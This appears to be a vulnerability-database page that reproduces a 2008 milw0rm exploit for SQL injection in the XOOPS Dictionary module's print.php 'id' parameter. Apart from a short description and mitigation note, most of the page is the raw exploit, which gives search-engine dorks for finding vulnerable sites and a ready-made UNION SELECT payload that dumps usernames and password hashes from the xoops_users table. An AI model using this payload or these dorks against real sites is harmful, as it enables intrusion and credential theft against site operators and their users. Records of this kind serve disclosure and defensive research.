XOOPS Module dictionary(0.94-0.91-0.70)SQL Injection

vendor:

Dictionary

by:

S@BUN

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: Dictionary

Affected Version From: 0.94

Affected Version To: 0.7

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

XOOPS Module dictionary(0.94-0.91-0.70)SQL Injection

The vulnerability exists in the modules/dictionary/print.php script, when the 'id' parameter is supplied with a malicious SQL query, it is possible to extract information from the database.

Mitigation:

The vendor has released an update to address this vulnerability.

Source

Exploit-DB raw data:

##########################################
#
# XOOPS Module dictionary(0.94-0.91-0.70)SQL Injection
#
##########################################
#
##AUTHOR : S@BUN
#
####HOME : http://www.milw0rm.com/author/1334
#
####MAÄ°L : hackturkiye.hackturkiye@gmail.com
#
###########################################
#
# DORK 1 : allinurl: "modules/dictionary"
#
# DORK 2 : allinurl: "modules/dictionary/print.php?id"
#
###########################################
EXPLOIT :

modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*
###########################################
Dictionary Version 0.94 by nagl.ch
Dictionary Version 0.91 by nagl.ch
Dictionary Version 0.70 by nagl.ch
###########################################
##################S@BUN####################
###########################################
#####hackturkiye.hackturkiye@gmail.com#####
###########################################

# milw0rm.com [2008-03-17]